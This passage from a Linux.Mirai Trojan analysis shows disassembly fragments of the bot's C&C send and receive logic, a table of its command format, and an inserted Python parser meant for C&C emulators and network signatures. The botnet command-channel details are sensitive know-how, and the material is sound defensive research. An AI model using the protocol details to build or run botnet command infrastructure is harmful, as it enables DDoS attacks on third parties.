Investigation of Linux.Mirai Trojan family
.text:0804B7BE push ebx ; int
.text:0804B7BF call ___libc_send
.text:0804B7C4 mov dword ptr [esp+0], 3
.text:0804B7CB call get_data_char ; fetch the single byte to send
.text:0804B7D0 mov ecx, ds:fd ; socket connected to the C&C server
.text:0804B7D6 mov [esp+49Ch+var_15], al
.text:0804B7DD push 4000h ; int (flags: MSG_NOSIGNAL)
.text:0804B7E2 push 1 ; int (len = 1 byte)
.text:0804B7E4 xor esi, esi
.text:0804B7E6 lea eax, [esp+4A4h+var_15]
.text:0804B7ED push eax ; char * (buf)
.text:0804B7EE push ecx ; int (fd)
.text:0804B7EF call ___libc_send ; send(fd, &var_15, 1, MSG_NOSIGNAL)
Data received from the C&C server is saved to a buffer. If more than one command arrives during a single
iteration, the commands are handled one after another. The format of a received command (numeric fields
use network byte order) is as follows:

Field                Purpose                                                         Size (bytes)
fullLength           full length of the received command                             2
sleepTime            execution time (every command is run in a new process           4
                     created with fork, which is killed when this time expires)
cmd                  command number                                                  1
hostCount            number of attacked hosts                                        1
target[hostCount]    target array                                                    5*hostCount
param_cnt            number of parameters                                            1
param[param_cnt]     parameters                                                      ...
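To make the layout above concrete, here is a parser for that command format, added as an illustration; it is not code from the Dr.Web report or from the Mirai source. It walks a receive buffer that may hold several commands back to back and also handles the fullLength == 0 case, which the bot answers with two zero bytes. Three details the page does not spell out are assumptions here: the fullLength value is taken to cover the bytes after the 2-byte length field itself; each 5-byte target entry is read as a 4-byte IPv4 address followed by a 1-byte prefix length; and each parameter is read as a key byte, a length byte and the value bytes (the page marks the parameter encoding only as "..."). The sample buffer is constructed for the example.

```python
import struct
import ipaddress

# Reply sent back to the C&C server for a command with fullLength == 0 (keepalive).
KEEPALIVE_REPLY = b"\x00\x00"

# Constructed sample: a keepalive immediately followed by one attack command,
# as they could arrive together in a single recv() buffer.
SAMPLE_BODY = (
    b"\x00\x00\x00\x3c"        # sleepTime = 60 (network byte order)
    b"\x0a"                    # cmd = 10 (arbitrary command number for the sample)
    b"\x02"                    # hostCount = 2
    b"\xc0\xa8\x01\x0a\x20"    # target 192.168.1.10/32 (assumed: IPv4 + prefix length)
    b"\x0a\x00\x00\x00\x08"    # target 10.0.0.0/8
    b"\x01"                    # param_cnt = 1
    b"\x00\x02" b"80"          # param: key 0, length 2, value "80" (assumed encoding)
)
# Assumption: fullLength counts the bytes that follow the 2-byte length field.
SAMPLE_BUFFER = b"\x00\x00" + struct.pack("!H", len(SAMPLE_BODY)) + SAMPLE_BODY

MIN_BODY = 4 + 1 + 1 + 1  # sleepTime + cmd + hostCount + param_cnt


def parse_command(buf, off=0):
    """Parse one command at buf[off:].

    Returns (command dict, next offset), or (None, next offset) for a keepalive.
    Raises ValueError on truncated or inconsistent input instead of reading past it.
    """
    if len(buf) - off < 2:
        raise ValueError("need 2 bytes for fullLength")
    (full_len,) = struct.unpack_from("!H", buf, off)  # network byte order, like ror ax, 8
    off += 2
    if full_len == 0:
        return None, off
    body = buf[off:off + full_len]
    if len(body) != full_len:
        raise ValueError("truncated command: fullLength=%d, have %d" % (full_len, len(body)))
    if full_len < MIN_BODY:
        raise ValueError("command body too short")
    (sleep_time,) = struct.unpack_from("!I", body, 0)
    cmd, host_count = body[4], body[5]
    p = 6
    targets = []
    for _ in range(host_count):
        if p + 5 > len(body):
            raise ValueError("truncated target list")
        ip = ipaddress.IPv4Address(bytes(body[p:p + 4]))
        targets.append((str(ip), body[p + 4]))
        p += 5
    if p >= len(body):
        raise ValueError("missing param_cnt")
    param_cnt = body[p]
    p += 1
    params = {}
    for _ in range(param_cnt):
        if p + 2 > len(body):
            raise ValueError("truncated parameter header")
        key, vlen = body[p], body[p + 1]
        p += 2
        if p + vlen > len(body):
            raise ValueError("truncated parameter value")
        params[key] = bytes(body[p:p + vlen])
        p += vlen
    if p != full_len:
        raise ValueError("fullLength does not match the parsed fields")
    command = {"sleep_time": sleep_time, "cmd": cmd, "targets": targets, "params": params}
    return command, off + full_len


def handle_buffer(buf):
    """Walk a recv() buffer holding one or more commands, one after another.

    Returns (parsed commands, replies the bot would send back).
    """
    commands, replies, off = [], [], 0
    while off < len(buf):
        command, off = parse_command(buf, off)
        if command is None:
            replies.append(KEEPALIVE_REPLY)
        else:
            commands.append(command)
    return commands, replies


if __name__ == "__main__":
    cmds, replies = handle_buffer(SAMPLE_BUFFER)
    print("replies:", replies)
    for c in cmds:
        print("command:", c)
```

Every length check fails closed with ValueError rather than reading beyond the buffer, which is the property to keep in mind when writing a C&C emulator or a network signature for this format: a hostCount or param length larger than the remaining data is malformed, not merely short.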
If fullLength == 0, two zero bytes are sent to the C&C server:<br />
.text:0804B518 recv_ok: ; CODE XREF: main+165j
.text:0804B518 mov ax, [edi] ; fullLength
.text:0804B51B ror ax, 8 ; byte swap (ntohs)
.text:0804B51F test ax, ax
.text:0804B522 jnz short process_command
.text:0804B524 mov eax, ds:fd